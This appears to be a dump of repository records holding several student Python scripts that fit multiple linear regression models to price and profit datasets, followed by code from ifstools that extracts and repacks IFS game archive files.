sm\r\nsm.graphics.influence_plot(mod2)\r\ne0_comp = e_comp.drop(e_comp.index[[1400,1700,79,85,3,169,230,1688,2281]],axis = 0)\r\n\r\nmod2_new = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e0_comp).fit()\r\nmod2_new.summary()\r\n\r\nsm.graphics.influence_plot(mod2_new)\r\n\r\ne1_comp = e0_comp.drop(e0_comp.index[[6185,54,1991,4755,4125,4354,141,2474]],axis = 0)\r\n\r\nfmod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e1_comp).fit()\r\nfmod2.summary()\r\n\r\npred2 = fmod2.predict(e1_comp)#Predicting the price using model1\r\nrootmse2 = rmse(pred2,e1_comp.pr)#calculating the root mean square error\r\nrootmse2# = 256.839537400504\r\nact2 = comp.pr\r\ndf = pd.DataFrame(list(zip(pred2, act2)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n#mod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=comp).fit()\r\n#mod2.summary()\r\n\r\n\r\n#sm.graphics.influence_plot(mod2)\r\n#e_comp = comp.drop(comp.index[[1400,1700]],axis = 0)\r\n\r\n############################################# Building the model 3 ################################################\r\n\r\ne1_comp['ad_sq'] = np.square(e1_comp.ad)\r\ne1_comp['pre_sq'] = np.square(e_comp.pre)\r\nmod3 = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e1_comp).fit()\r\nmod3.summary()\r\n\r\nsm.graphics.influence_plot(mod3)\r\n\r\ne2_comp = e1_comp.drop(e1_comp.index[[5429,5373,604,5075,4853,4685,4648,4268,5349,4066,4363,4227,4259,3990,4209,4282,4073,4091,3535,3767,4003,3964,981,5434,3828,4005,5345,271,5423,645,5212,3183,5452,3821,70,4212,3666,2256,2232,1856]],axis = 0)\r\n \r\n\r\nmod3_new = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e2_comp).fit()\r\nmod3_new.summary()\r\n\r\nsm.graphics.influence_plot(mod3_new)\r\n\r\ne3_comp = e2_comp.drop(e2_comp.index[[1440,1688,2281,4409,4091,3964,981,5345,5434,271,4066,4363,4227,4259,4282,4073,5429,5373,4685,4755,3821,4003,3535,3767,4209,3990,3479,141,4853,5212,3183,5349,5075,4409,3935,2976,1101,1700,1805,309,207,27,174,24,418,313,1117,1047,795,2000,1432,1792]],axis = 0)\r\n\r\nfinal_mod3 = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e3_comp).fit()\r\nfinal_mod3.summary()\r\n\r\npred1_log = final_mod3.predict(e3_comp)#Predicting the price using model1\r\npred1 = np.exp(pred1)\r\nrootmse = rmse(pred1,e3_comp.pr)#calculating the root mean square error\r\nrootmse# = 243.59066549716243\r\n\r\n#Since the root mean Square Error is much lesser than that of the model2's root mean square error .\r\n#Model 3 has a better RSquared Value, i.e. R^Squared Error does'nt improve above 0.815, Hence We Shall Stop\r\nact1 = e3_comp.pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n\r\nvalues = list([mod1.rsquared,nmod1.rsquared,mod2_new.rsquared,mod2_new.rsquared,fmod2.rsquared,mod3.rsquared,mod3_new.rsquared,final_mod3.rsquared])\r\nvariables = list(['Model 1','Model 1 New','Final Model 2','Model 2 New','Final Model 2','Model 3','Model 3 New','Final Model 3'])\r\ncoded_variables = list(['mod1.rsquared','nmod1.rsquared','mod2_new.rsquared','mod2_new.rsquared','fmod2.rsquared','mod3.rsquared','mod3_new.rsquared','final_mod3.rsquared'])\r\nRsquared_model = pd.DataFrame(list(zip(variables,coded_variables,values)),columns = ['Models','Variabels Named in the code','R^Squared Values'])\r\nRsquared_model#Below is the table that shows how, on removing those outliers, R^Squared Value has improved.\r\n'''\r\n Models Variabels Named in the code R^Squared Values\r\n0 Model 1 mod1.rsquared 0.775568\r\n1 Model 1 New nmod1.rsquared 0.775270\r\n2 Final Model 2 mod2_new.rsquared 0.803485\r\n3 Model 2 New mod2_new.rsquared 0.803485\r\n4 Final Model 2 fmod2.rsquared 0.803731\r\n5 Model 3 mod3.rsquared 0.815282\r\n6 Model 3 New mod3_new.rsquared 0.815236\r\n7 Final Model 3 final_mod3.rsquared 0.815467\r\n'''" }, { "alpha_fraction": 0.5905848741531372, "alphanum_fraction": 0.6257132887840271, "avg_line_length": 54.64646530151367, "blob_id": "e53bd70368af0c15a8868e689099e5f7eb907571", "content_id": "986f7a70da345b5020817e2a2cb681d8db6feb3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5608, "license_type": "no_license", "max_line_length": 144, "num_lines": 99, "path": "/50_Startups_Python Codes.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 19 07:39:58 2020\r\n\r\n@author: Neeraj KUmar S J\r\n\"\"\"\r\n############################################# Importing the Modules ##############################################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n############################################# Importing the dataset ##############################################\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\ToyotaCorolla.csv\")\r\n#Stu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\")\r\nStu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\50_Startups.csv,encoding = \"ISO-8859-1\")\r\nstu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\50_Startups.csv\",encoding = \"ISO-8859-1\")\r\nstu\r\nstu.describe()\r\nstu.columns = 'RD','Ad','MS','St','Pr'\r\n############################################# Label Encoding the state variable ##################################\r\nLe = preprocessing.LabelEncoder()\r\nstu['St_t'] = Le.fit_transform(stu['St'])\r\nstu = stu.drop('St',axis = 1)\r\nstu.columns = 'RD','Ad','MS','Pr','St'\r\n#finding the correlation between variables\r\ncor_stu = stu.corr()\r\n############################################# Visualizing and normalizing the data to remove outliers ###########\r\n#sstu = stu.drop('St',axis = 1)\r\nn_stu = preprocessing.normalize(stu)\r\nplt.hist(n_stu)\r\nimport seaborn as sns\r\nsns.pairplot(stu)\r\n\r\n############################################# Building the model1 ################################################\r\n\r\nmod1 = smf.ols('Pr~RD+Ad+MS+St',data=stu).fit()\r\nmod1.summary()#Since the p values for Ad, Ms and St are above than 0.05, so lets check for significance\r\n\r\nmod1_Ad = smf.ols('Pr~Ad',data=stu).fit()#applying model 1 for only Ad against profit\r\nmod1_Ad.summary()# looks like there is 16.9% of errors in prediction caused by Ad variable\r\n\r\nmod1_MS = smf.ols('Pr~MS',data=stu).fit()#applying model 1 for only MS against profit\r\nmod1_MS.summary()#Shows that it is significant\r\n\r\nmod1_St = smf.ols('Pr~St',data=stu).fit()#applying model 1 for only St against profit\r\nmod1_St.summary()#looks like there is 48.2% of errors in prediction caused by St variable\r\n\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)#checking the data points which are influencing\r\n\r\ne_stu = stu.drop(stu.index[[49,48,46,19]],axis = 0)# Looks like 49,48,46,19 data points are influencing, \r\n # Hence we remove it.\r\nmod1_new = smf.ols('Pr~RD+Ad+MS',data=e_stu).fit()# Applying model 1 for newly created dataset with variables \r\n # Ad, Rd and MS against profit, removing St as it is not \r\n # explaining the profit variables.\r\nmod1_new.summary()#Since the p values for Ad and MS are above than 0.05, so lets check for significance\r\n# Hence we calculate vif values for every varaible against other two variables among RD, Ad and MS\r\n# Whose vif value must be less than 10 for the variable to be significant\r\nrsq_RD = smf.ols('RD~Ad+MS',data=e_stu).fit().rsquared# Ad and MS against RD\r\nvif_RD = 1/(1-rsq_RD)# = 1.19698289102702, Hence significant\r\n\r\nrsq_MS = smf.ols('MS~RD+Ad',data=e_stu).fit().rsquared# Ad and RD against MS \r\nvif_MS = 1/(1-rsq_MS)# = 2.99273159509313, Hence significant\r\n\r\nrsq_Ad = smf.ols('Ad~MS+RD',data=e_stu).fit().rsquared# RD and MS against Ad\r\nvif_Ad = 1/(1-rsq_Ad)# = 3.04709935040856, Hence significant\r\n\r\nd1 = {'Variables':['RD','MS','Ad'],'VIF':[vif_RD,vif_MS,vif_Ad]}# Combining the vif values wrt its variables\r\nVif_frame = pd.DataFrame(d1)# To a data frame\r\nVif_frame\r\n\r\nsm.graphics.plot_partregress_grid(mod1_new)#Plotting regression models to check which variables explaining the most\r\n\r\nfmod1_new = smf.ols('Pr~RD+MS',data=e_stu).fit()#We shall be removing Ad, even though it has feasible vif values, \r\n #it does'nt have feasible p values to model 1, Hence the model 1 is\r\n #created without Ad\r\nfmod1_new.summary()# Looks R Squared value of the model and the p values of variable are feasible\r\n\r\npred1 = fmod1_new.predict(e_stu)#Predicting the price using model1\r\nrootmse = rmse(pred1,e_stu.Pr)#calculating the root mean square error\r\nrootmse# = 7076.114277848526\r\nact1 = e_stu.Pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n#Creating a table for all the Rsquared Values of the diffrent models that was built during correction of influenicing poins in the data set.\r\nvalues = list([mod1.rsquared,mod1_new.rsquared,fmod1_new.rsquared])\r\ncoded_variables = list(['mod1.rsquared','mod1_new.rsquared','fmod1_new.rsquared'])\r\nvariables = list(['Model 1','Model 1 New','Final Model 1'])\r\n#R_Squared_value_Of_models = {'Variables':[],'R^2 Value':[]}\r\nRsquared_model = pd.DataFrame(list(zip(variables,coded_variables,values)),columns = ['Models','Variabels Named in the code','R^Squared Values'])\r\nRsquared_model#Below is the table that shows how, on removing those outliers, R^Squared Value has improved.\r\n'''\r\n Models Variabels Named in the code R^Squared Values\r\n0 Model 1 mod1.rsquared 0.950746\r\n1 Model 1 New mod1_new.rsquared 0.962343\r\n2 Final Model 1 fmod1_new.rsquared 0.961076\r\n...\r\n" }, { "alpha_fraction": 0.47148409485816956, "alphanum_fraction": 0.5077197551727295, "avg_line_length": 73.5793685913086, "blob_id": "64df199b17adf22b56f7de9cebfd544cf84f28ba", "content_id": "bad55b5a32f3c025268ed657b9500c5da04d87cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9521, "license_type": "no_license", "max_line_length": 423, "num_lines": 126, "path": "/Toyota-Python_codes.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 18 13:31:07 2020\r\n\r\n@author: Neeraj Kumar S J\r\n\"\"\"\r\n############################################################## Importing the necassary modules ########################################################################################################################################################################################################################################################################################################################################\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n############################################################## Importing the dataset ##################################################################################################################################################################################################################################################################################################################################################\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\ToyotaCorolla.csv\")\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\")\r\ntoy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\",encoding = \"ISO-8859-1\")\r\ntoy.columns#Checking the columns which coukd be removed\r\ne_toy = toy.drop(['Id', 'Model', 'Mfg_Month', 'Mfg_Year','Fuel_Type', 'Met_Color', 'Color', 'Automatic', 'Cylinders', 'Mfr_Guarantee', 'BOVAG_Guarantee', 'Guarantee_Period', 'ABS', 'Airbag_1', 'Airbag_2','Airco', 'Automatic_airco', 'Boardcomputer', 'CD_Player','Central_Lock', 'Powered_Windows', 'Power_Steering', 'Radio','Mistlamps', 'Sport_Model', 'Backseat_Divider', 'Metallic_Rim','Radio_cassette', 'Tow_Bar'],axis = 1)\r\ne_toy.describe\r\ncor_toy = e_toy.corr()#checking the correlation between variables\r\ncor_toy.columns\r\ne_toy.columns = 'Price','Age','KM','HP','cc','Dr','gr','Qt','Wt'#Editting the column names\r\nimport seaborn as sns\r\nsns.pairplot(e_toy)#Checking for highly colinear variables\r\n############################################################## BUilding Model 1 #######################################################################################################################################################################################################################################################################################################################################################\r\nmod1 = smf.ols('Price ~ Age+KM+HP+cc+Dr+gr+Qt+Wt',data=e_toy).fit()\r\nmod1.summary()\r\n#Since the p values for cc and Dr are above than 0.05, so lets check for significance\r\nmod_1c = smf.ols('Price ~ cc',data=e_toy).fit()#applying model 1 for only cc against price\r\nmod_1c.summary()#Shows that it is significant\r\n\r\nmod_1d = smf.ols('Price~Dr',data=e_toy).fit()#applying model 1 for only Dr against price\r\nmod_1d.summary()#Shows that it is significant\r\n\r\nmod1_dc = smf.ols('Price~cc+Dr',data=e_toy).fit()#applying model 1 for Dr and cc against price\r\nmod1_dc.summary()#Shows that both are significant\r\n\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)#checking the data points which are influencing\r\n\r\ne_new = e_toy.drop(e_toy.index[[80,960,221]],axis = 0)#Looks like 80,860,221 data points are influencing, Hence we remove it.\r\n\r\nmod1_new = smf.ols('Price ~ Age+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new).fit()#Applying model1 for the newly created data set\r\nmod1_new.summary()#Looks good here as all the variable's p values are below 0.05\r\nact1 = e_new.Price\r\n#sm.graphics.plot_partregress_grid(mod1_new)\r\n#Prdicting Prices using mod1\r\npred1 = mod1_new.predict(e_new)#Predicting the price using model1\r\nrootmse = rmse(pred1,e_new.Price)#calculating the root mean square error\r\nrootmse# = 1227.473986005888\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices.\r\ndf\r\n'''\r\n############################################################## BUilding Model 2 #######################################################################################################################################################################################################################################################################################################################################################\r\nmod2 = smf.ols('Price ~ np.log(Age)+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new).fit()\r\nmod2.summary()\r\n#Since the p values for cc and Dr are above than 0.05, so lets check for significance\r\nmod_2d = smf.ols('Price~Dr',data=e_new).fit()#applying model 2 for only Dr against price\r\nmod_2d.summary()#Shows that it is significant\r\n#e_new2 = e_new2.drop(['Dr'], axis = 1)\r\n\r\n#import statsmodels.api as sm\r\nsm.graphics.influence_plot(mod2)#checking the data points which are influencing\r\n\r\ne_new2 = e_new.drop(e_new.index[[184,185,991,956,109,110,111,49]],axis = 0)#Looks like 184,185,991,956,109,110,111,49 data points are influencing, Hence we remove it.\r\n\r\nmod2_new = smf.ols('Price ~ np.log(Age)+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new2).fit()#Applying model2 for the newly created data set\r\nmod2_new.summary()#Looks Dr variable values are not yet below 0.05\r\n\r\nsm.graphics.influence_plot(mod2_new)#checking the data points which are influencing\r\n\r\n#e_new3 = e_new2.drop(e_new2.index[[184,185,991,956,109]],axis = 0)#Looks like 184,185,991,956,109 data points are influencing, Hence we remove it.\r\nsm.graphics.plot_partregress_grid(mod2_new)\r\n\r\nfmod2_new = smf.ols('Price ~ np.log(Age)+KM+HP+cc+gr+Qt+Wt',data=e_new2).fit()#Applying model2 for the newly created data set and we shal remove Dr Variable\r\nfmod2_new.summary()#Looks good here as all the variable's p values are below 0.05\r\n\r\n#Prdicting Prices using mod2\r\npred2 = mod2_new.predict(e_new2)\r\nrootmse2 = rmse(pred2,e_new2.Price)\r\nrootmse2 # = 1256.1065020469682 <<Seems like model2 is better than model 1, based on Root Mean Square \r\n\r\nact2 = e_new2.Price\r\ndf = pd.DataFrame(list(zip(pred2, act2)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\nsns.pairplot(e_new3);sns.pairplot(e_new.Prices, pred2, color='black')\r\n\r\n############################################################## BUilding Model 3 #######################################################################################################################################################################################################################################################################################################################################################\r\nmod3 = smf.ols('Price ~ np.log(Age)+np.log(KM)+HP+cc+gr+Qt+Wt',data=e_new3).fit()\r\nmod3.summary()\r\n#Since the p values of all variables are less than 0.05. We can go for prediction\r\n#Prdicting Prices using mod3\r\npred3 = mod3.predict(e_new3)\r\nrootmse3 = rmse(pred3,e_new3.Price)\r\nrootmse3 # = 1356.442261894533 <<Seems like model3 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms or Rsquared value\r\nact3 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred3, act3)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n#sns.pairplot(e_new3);sns.pairplot(e_new.Prices, pred2, color='black')\r\n############################################################## BUilding Model 4 #######################################################################################################################################################################################################################################################################################################################################################\r\n\r\nmod4 = smf.ols('Price ~ np.log(Age)+np.log(KM)+np.log(cc)+HP+gr+Qt+Wt',data=e_new3).fit()\r\nmod4.summary()\r\n#Since the p values of all variables are less than 0.05. We can go for prediction\r\n#Prdicting Prices using mod3\r\npred4 = mod4.predict(e_new3)\r\nrootmse4 = rmse(pred4,e_new3.Price)\r\nrootmse4 # = 1356.442261894533 <<Seems like model3 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms or Rsquared value\r\nact4 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred4, act4)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n############################################################## BUilding Model 5 #######################################################################################################################################################################################################################################################################################################################################################\r\n\r\nmod5 = smf.ols('Price ~ np.log(Age)+np.log(KM)+np.log(cc)+HP+np.log(gr)+Qt+Wt',data=e_new3).fit()\r\nmod5.summary()\r\n#Since the p values of all variables are less than 0.05. We can go for prediction\r\n#Prdicting Prices using mod3\r\npred5 = mod5.predict(e_new3)\r\nrootmse5 = rmse(pred5,e_new3.Price)\r\nrootmse5 # = 1356.442261894533 <<Seems like model3 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms or Rsquared value\r\nact5 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred5, act5)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n'''" } ]
3
ReimuYk/ifstools
https://github.com/ReimuYk/ifstools
1ac874bc105d9c49384da3b97f31ce3629727f0f
cfcb369a0271d6c53df38b769c496ca8149d9a51
701dc823c84cca9d296f164ecb2fdfdb9814822c
refs/heads/master
2023-03-17T10:51:09.367506
2020-10-25T06:56:07
2020-10-25T06:56:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5509524941444397, "alphanum_fraction": 0.5572406053543091, "avg_line_length": 34.28858947753906, "blob_id": "aceb4411502d70f811410fa94a715cfc94991581", "content_id": "fa2cb6cf6a1e5122c8d0896d1d5e6e3cb325a078", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10814, "license_type": "permissive", "max_line_length": 141, "num_lines": 298, "path": "/ifstools/ifs.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from collections import defaultdict\r\nfrom multiprocessing import Pool\r\nfrom os.path import basename, dirname, splitext, join, isdir, isfile, getmtime\r\nfrom os import utime, walk\r\nfrom io import BytesIO\r\nimport itertools\r\nimport hashlib\r\nimport lxml.etree as etree\r\nfrom time import time as unixtime\r\n\r\nfrom tqdm import tqdm\r\nfrom kbinxml import KBinXML\r\nfrom kbinxml.bytebuffer import ByteBuffer\r\n\r\nfrom .handlers import GenericFolder, MD5Folder, ImageFile, ImageCanvas\r\nfrom . import utils\r\n\r\nSIGNATURE = 0x6CAD8F89\r\n\r\nFILE_VERSION = 3\r\n\r\n# must be toplevel or can't be pickled\r\ndef _extract(args):\r\n f, path, kwargs = args\r\n f.extract(path, **kwargs)\r\n return f\r\n\r\ndef _load(args):\r\n f, kwargs = args\r\n f.preload(**kwargs)\r\n return f.full_path\r\n\r\nclass FileBlob(object):\r\n ''' a basic wrapper around a file to deal with IFS data offset '''\r\n def __init__(self, file, offset):\r\n self.file = file\r\n self.offset = offset\r\n\r\n def get(self, offset, size):\r\n self.file.seek(offset + self.offset)\r\n return self.file.read(size)\r\n\r\nclass IFS:\r\n def __init__(self, path, super_disable = False, super_skip_bad = False,\r\n super_abort_if_bad = False):\r\n if isfile(path):\r\n self.load_ifs(path, super_disable, super_skip_bad, super_abort_if_bad)\r\n elif isdir(path):\r\n self.load_dir(path)\r\n else:\r\n raise IOError('Input path {} does not exist'.format(path))\r\n\r\n def load_ifs(self, path, super_disable = False, super_skip_bad = False,\r\n super_abort_if_bad = False):\r\n self.is_file = True\r\n\r\n name = basename(path)\r\n self.ifs_out = name\r\n self.folder_out = splitext(name)[0] + '_ifs'\r\n self.default_out = self.folder_out\r\n\r\n self.file = open(path, 'rb')\r\n header = ByteBuffer(self.file.read(36))\r\n\r\n signature = header.get_u32()\r\n if signature != SIGNATURE:\r\n raise IOError('Given file was not an IFS file!')\r\n self.file_version = header.get_u16()\r\n # next u16 is just NOT(version)\r\n assert header.get_u16() ^ self.file_version == 0xFFFF\r\n self.time = header.get_u32()\r\n ifs_tree_size = header.get_u32()\r\n manifest_end = header.get_u32()\r\n self.data_blob = FileBlob(self.file, manifest_end)\r\n\r\n self.manifest_md5 = None\r\n if self.file_version > 1:\r\n self.manifest_md5 = header.get_bytes(16)\r\n\r\n self.file.seek(header.offset)\r\n self.manifest = KBinXML(self.file.read(manifest_end-header.offset))\r\n self.tree = GenericFolder(self.data_blob, self.manifest.xml_doc,\r\n super_disable=super_disable, super_skip_bad=super_skip_bad,\r\n super_abort_if_bad=super_abort_if_bad\r\n )\r\n\r\n # IFS files repacked with other tools usually have wrong values - don't validate this\r\n #assert ifs_tree_size == self.manifest.mem_size\r\n\r\n def load_dir(self, path):\r\n self.is_file = False\r\n self.file = None\r\n\r\n path = path.rstrip('/\\\\')\r\n self.folder_out = basename(path)\r\n if '_ifs' in self.folder_out:\r\n self.ifs_out = self.folder_out.replace('_ifs', '.ifs')\r\n else:\r\n self.ifs_out = self.folder_out + '.ifs'\r\n self.default_out = self.ifs_out\r\n\r\n self.file_version = FILE_VERSION\r\n self.time = int(getmtime(path))\r\n self.data_blob = None\r\n self.manifest = None\r\n\r\n os_tree = self._create_dir_tree(path)\r\n self.tree = GenericFolder(None, os_tree)\r\n\r\n def _create_dir_tree(self, path):\r\n tree = self._create_dir_tree_recurse(walk(path))\r\n if 'ifs_manifest.xml' in tree['files']:\r\n tree['files'].remove('ifs_manifest.xml')\r\n\r\n return tree\r\n\r\n def _create_dir_tree_recurse(self, walker):\r\n tree = {}\r\n\r\n root, dirs, files = next(walker)\r\n tree['path'] = root\r\n tree['files'] = files\r\n tree['folders'] = []\r\n for dir in dirs:\r\n tree['folders'].append(self._create_dir_tree_recurse(walker))\r\n\r\n return tree\r\n\r\n def close(self):\r\n if self.file:\r\n self.file.close()\r\n\r\n def __str__(self):\r\n return str(self.tree)\r\n\r\n def extract(self, progress = True, recurse = True, tex_only = False,\r\n extract_manifest = False, path = None, rename_dupes = False, **kwargs):\r\n if path is None:\r\n path = self.folder_out\r\n if tex_only:\r\n kwargs['use_cache'] = False\r\n utils.mkdir_silent(path)\r\n utime(path, (self.time, self.time))\r\n\r\n if extract_manifest and self.manifest and not tex_only:\r\n with open(join(path, 'ifs_manifest.xml'), 'wb') as f:\r\n f.write(self.manifest.to_text().encode('utf8'))\r\n\r\n # build the tree\r\n for folder in self.tree.all_folders:\r\n if tex_only and folder.name == 'tex':\r\n self.tree = folder\r\n # make it root to discourage repacking\r\n folder.name = ''\r\n for f in folder.all_files:\r\n f.path = ''\r\n break\r\n elif tex_only:\r\n continue\r\n f_path = join(path, folder.full_path)\r\n utils.mkdir_silent(f_path)\r\n utime(f_path, (self.time, self.time))\r\n\r\n # handle different-case-but-same-name for Windows\r\n same_name = defaultdict(list)\r\n for name, obj in folder.files.items():\r\n same_name[name.lower()].append(obj)\r\n\r\n for files in same_name.values():\r\n # common base case of \"sane ifs file\"\r\n if len(files) == 1:\r\n continue\r\n\r\n # make them 'a (1)', 'a (2)' etc\r\n if rename_dupes:\r\n for i, f in enumerate(files[1:]):\r\n base, ext = splitext(f.name)\r\n f.name = base + ' ({})'.format(i+1) + ext\r\n elif progress: # warn if not silenced\r\n all_names = ', '.join([f.name for f in files])\r\n tqdm.write('WARNING: Files with same name and differing case will overwrite on Windows ({}). '.format(all_names) +\r\n 'Use --rename-dupes to extract without loss')\r\n # else just do nothing\r\n\r\n # extract the files\r\n for f in tqdm(self.tree.all_files, disable = not progress):\r\n # allow recurse + tex_only to extract ifs files\r\n if tex_only and not isinstance(f, ImageFile) and not isinstance(f, ImageCanvas) and not (recurse and f.name.endswith('.ifs')):\r\n continue\r\n f.extract(path, **kwargs)\r\n if progress:\r\n tqdm.write(f.full_path)\r\n if recurse and f.name.endswith('.ifs'):\r\n rpath = join(path, f.full_path)\r\n i = IFS(rpath)\r\n i.extract(progress=progress, recurse=recurse, tex_only=tex_only,\r\n extract_manifest=extract_manifest, path=rpath.replace('.ifs','_ifs'),\r\n rename_dupes=rename_dupes, **kwargs)\r\n\r\n\r\n # you can't pickle open files, so this won't work. Perhaps there is a way around it?\r\n '''to_extract = (f for f in self.tree.all_files if not(tex_only and not isinstance(f, ImageFile) and not isinstance(f, ImageCanvas)))\r\n\r\n p = Pool()\r\n args = zip(to_extract, itertools.cycle((path,)), itertools.cycle((kwargs,)))\r\n\r\n to_recurse = []\r\n for f in tqdm(p.imap_unordered(_extract, args)):\r\n if progress:\r\n tqdm.write(f)\r\n if recurse and f.name.endswith('.ifs'):\r\n to_recurse.append(join(path, f.full_path))\r\n\r\n for rpath in recurse:\r\n i = IFS(rpath)\r\n i.extract(progress=progress, recurse=recurse, tex_only=tex_only,\r\n extract_manifest=extract_manifest, path=rpath.replace('.ifs','_ifs'), **kwargs)'''\r\n\r\n def repack(self, progress = True, path = None, **kwargs):\r\n if path is None:\r\n path = self.ifs_out\r\n # open first in case path is bad\r\n ifs_file = open(path, 'wb')\r\n\r\n self.data_blob = BytesIO()\r\n\r\n self.manifest = KBinXML(etree.Element('imgfs'))\r\n manifest_info = etree.SubElement(self.manifest.xml_doc, '_info_')\r\n\r\n # the important bit\r\n data = self._repack_tree(progress, **kwargs)\r\n\r\n data_md5 = etree.SubElement(manifest_info, 'md5')\r\n data_md5.attrib['__type'] = 'bin'\r\n data_md5.attrib['__size'] = '16'\r\n data_md5.text = hashlib.md5(data).hexdigest()\r\n\r\n data_size = etree.SubElement(manifest_info, 'size')\r\n data_size.attrib['__type'] = 'u32'\r\n data_size.text = str(len(data))\r\n\r\n manifest_bin = self.manifest.to_binary()\r\n manifest_hash = hashlib.md5(manifest_bin).digest()\r\n\r\n head = ByteBuffer()\r\n head.append_u32(SIGNATURE)\r\n head.append_u16(self.file_version)\r\n head.append_u16(self.file_version ^ 0xFFFF)\r\n head.append_u32(int(unixtime()))\r\n head.append_u32(self.manifest.mem_size)\r\n\r\n manifest_end = len(manifest_bin) + head.offset + 4\r\n if self.file_version > 1:\r\n manifest_end += 16\r\n\r\n head.append_u32(manifest_end)\r\n\r\n if self.file_version > 1:\r\n head.append_bytes(manifest_hash)\r\n\r\n ifs_file.write(head.data)\r\n ifs_file.write(manifest_bin)\r\n ifs_file.write(data)\r\n\r\n ifs_file.close()\r\n\r\n def _repack_tree(self, progress = True, **kwargs):\r\n folders = self.tree.all_folders\r\n files = self.tree.all_files\r\n\r\n # Can't pickle lmxl, so to dirty-hack land we go\r\n kbin_backup = []\r\n for folder in folders:\r\n if isinstance(folder, MD5Folder):\r\n kbin_backup.append(folder.info_kbin)\r\n folder.info_kbin = None\r\n\r\n needs_preload = (f for f in files if f.needs_preload or not kwargs['use_cache'])\r\n args = list(zip(needs_preload, itertools.cycle((kwargs,))))\r\n p = Pool()\r\n for f in tqdm(p.imap_unordered(_load, args), desc='Caching', total=len(args), disable = not progress):\r\n if progress:\r\n tqdm.write(f)\r\n\r\n p.close()\r\n p.terminate()\r\n\r\n # restore stuff from before\r\n for folder in folders:\r\n if isinstance(folder, MD5Folder):\r\n folder.info_kbin = kbin_backup.pop(0)\r\n\r\n tqdm_progress = None\r\n if progress:\r\n tqdm_progress = tqdm(desc='Writing', total=len(files))\r\n self.tree.repack(self.manifest.xml_doc, self.data_blob, tqdm_progress, **kwargs)\r\n\r\n return self.data_blob.getvalue()\r\n" }, { "alpha_fraction": 0.5707113146781921, "alphanum_fraction": 0.5746164321899414, "avg_line_length": 35.212120056152344, "blob_id": "15ab3a9547863a42f58c5d091f19fb9c5d713b0b", "content_id": "fed22160a3d926e9b2477001981c61c720ea8dce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3585, "license_type": "permissive", "max_line_length": 94, "num_lines": 99, "path": "/ifstools/handlers/TexFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\n\nfrom kbinxml import KBinXML\nfrom tqdm import tqdm\nfrom PIL import Image, ImageDraw\n\nfrom . import MD5Folder, ImageFile, 